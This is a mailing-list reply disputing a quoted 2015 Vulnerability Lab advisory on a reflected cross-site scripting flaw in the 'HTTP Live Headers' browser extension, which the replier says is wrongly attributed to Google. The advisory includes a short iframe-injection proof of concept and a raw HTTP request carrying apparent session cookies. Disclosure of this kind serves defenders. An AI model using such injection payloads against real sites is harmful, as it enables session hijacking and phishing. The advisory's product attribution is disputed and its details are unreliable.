Re: Google HTTP Live Headers v1.0.6 - Client Side Cross Site- Scripting Web Vulnerability

From: Reindl Harald <h.reindl@thelounge.net>
To: Vulnerability Lab <research@vulnerability-lab.com>,bugtraq@securityfocus.com,bugs@securitytracker.com
Cc:
Subject: Re: Google HTTP Live Headers v1.0.6 - Client Side Cross Site- Scripting Web Vulnerability
Date:


this is *not* Google HTTP Live Headers and that was already told 
yesterday - "angeboten von https://www.esolutions.se" != Google as well 
as a random Firefox plugin from the addon page is not "Mozilla pluginname"

Am 04.07.2015 um 14:33 schrieb Vulnerability Lab:
> Document Title:
> ===============
> Google HTTP Live Headers v1.0.6 - Client Side Cross Site Scripting Web Vulnerability
>
>
> References (Source):
> ====================
> http://www.vulnerability-lab.com/get_content.php?id=1541
>
>
> Release Date:
> =============
> 2015-07-02
>
>
> Vulnerability Laboratory ID (VL-ID):
> ====================================
> 1541
>
>
> Common Vulnerability Scoring System:
> ====================================
> 3.3
>
>
> Product & Service Introduction:
> ===============================
> The Chrome Web Store is Google`s online store for web applications for Google Chrome or Google Apps. It was announced at the
> Google I/O conference on May 19, 2010 by Vic Gundotra and released on December 6, 2010. The software allows users to install
> and run web applications for the Google Chrome browser. The Chrome Web Store user experience and design was created by Fi.
> Applications, browser themes and extensions in the store are written in HTML, CSS, JavaScript and Google Apps Script and,
> from Chrome 14, can use Google Native Client. The store hosts free and paid applications.An example of applications available
> in the store includes the game Plants vs. Zombies. The Store has been described as being like Google Play, but for `apps on
> the web`. A visual and UI overhaul of the store was announced on October 25, 2011.
>
> (Copy of the Homepage: https://en.wikipedia.org/wiki/Chrome_Web_Store )
>
>
> Abstract Advisory Information:
> ==============================
> The Vulnerability Laboratory Research Team discovered a client-side cross site scripting web vulnerability in the official Google (Chrome Webstore) HTTP Live Headers v1.0.6 addon.
>
>
> Vulnerability Disclosure Timeline:
> ==================================
> 2015-07-02: Public Disclosure (Vulnerability Laboratory)
>
>
> Discovery Status:
> =================
> Published
>
>
> Affected Product(s):
> ====================
>
> Exploitation Technique:
> =======================
> Remote
>
>
> Severity Level:
> ===============
> Medium
>
>
> Technical Details & Description:
> ================================
> A client-side cross site scripting web vulnerability has been discovered in the official Google (Chrome Webstore) HTTP Live Headers v1.0.6 addon.
> The non-persistent cross site vulnerability allows remote attackers to inject own script code to the client-side of the vulnerable online-service module.
>
> The vulnerability is located in the `url` value of the `HTTP LIVE HEADERS` module. Remote attackers are able to inject own script codes to client-side application requests.
> The attack vector is non persistent and the request method to inject/execute is GET. The vulnerable source is located in the google chrome http live headers v1.0.6 addon.
>
> The security risk of the cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
> Exploitation of the cross site scripting web vulnerability requires no privilege web application user account and low or medium user interaction.
> Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent
> manipulation of affected or connected service modules.
>
> Request Method(s):
>                                                      [+] GET
>                                                      
> Vulnerable Module(s):
>                                                    [+] HTTP LIVE HEADERS
>                                                        
> Vulnerable File(s):
>                                                      [+] /webstore/detail/live-http-headers/iaiioopjkcekapmldfgbebdclcnpgnlo/reviews
>
> Vulnerable Parameter(s):
>                                                       [+] URL
>
>
> Proof of Concept (PoC):
> =======================
> The client-side cross site scripting web vulnerability can be exploited by remote attackers without privilege application user account and with low or medium user interaction.
> For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
>
> PoC:
> <td><input type="text" class="inputUrl"
> value="https://www.google.dz/#"><iframe src="http://vulnerability-lab.com">" /></td></tr></tbody></table></iframe></td>
>
> GET /#"><iframe src="http://vulnerability-lab.com"> HTTP/1.1
> Host: www.google.dz:443
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Encoding: gzip,deflate
> Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4,ar;q=0.2,pl;q=0.2
> Cookie: GoogleAccountsLocale_session=en; PREF=ID=1111111111111111:FF=0:LD=fr:TM=1427956789:LM=1435143116:S=0jHXsFA5zVimumn0;
> NID=68=I2ZTWkmbiYNTHKmTrAND6GKXsDHdliv4E99sLkdInHqquFvkc51YRf4HeVpA79wQ2eAi07kPpW1AivjwAGVUVN
> lUUlJplwliYstez-2DZr9MA6PIbZpPX4Z2q3tE9iP9zupmgXHI4GJG5llXaLR8VGWyMmEDPLiuXKA2i-GUBDuwGE7q77Qi5Q
> User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
>
> HTTP/1.1 200 OK
> alternate-protocol: 443:quic,p=1
> cache-control: private, max-age=0
> content-encoding: gzip
> content-type: text/html; charset=UTF-8
> date: Tue, 30 Jun 2015 15:21:45 GMT
> expires: -1
> server: gws
> status: 200 OK
> version: HTTP/1.1
> x-frame-options: SAMEORIGIN
> x-xss-protection: 1; mode=block
>
>
> Reference(s):
> https://chrome.google.com/webstore/detail/live-http-headers/iaiioopjkcekapmldfgbebdclcnpgnlo/reviews
>
>
> Solution - Fix & Patch:
> =======================
> The vulnerability can be patched by a secure parse and encode of the url value in the preview GET method request.
> Restrict the input and disallow usage of special chars to prevent further client-side script code injection attacks via GET method.
> Setup an exception that prevent the output execution by redirection to a secure path location.
>
>
> Security Risk:
> ==============
> The security risk of the client-side cross site scripting web vulnerability is estimated as medium. (CVSS 3.3)
>
>
> Credits & Authors:
> ==================
> Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr]
>
>
> Disclaimer & Information:
> =========================
> The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
> or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
> in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
> or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
> consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
> policies, deface websites, hack into databases or trade with fraud/stolen material.
>
> Domains:    www.vulnerability-lab.com        - www.vuln-lab.com                                      - www.evolution-sec.com
> Contact:    admin@vulnerability-lab.com      - research@vulnerability-lab.com                        - admin@evolution-sec.com
> Section:    magazine.vulnerability-db.com  - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
> Social:      twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
> Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
> Programs:   vulnerability-lab.com/submit.php        - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
>
> Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
> electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
> Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
> is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
> (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
>
>                              Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
>





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.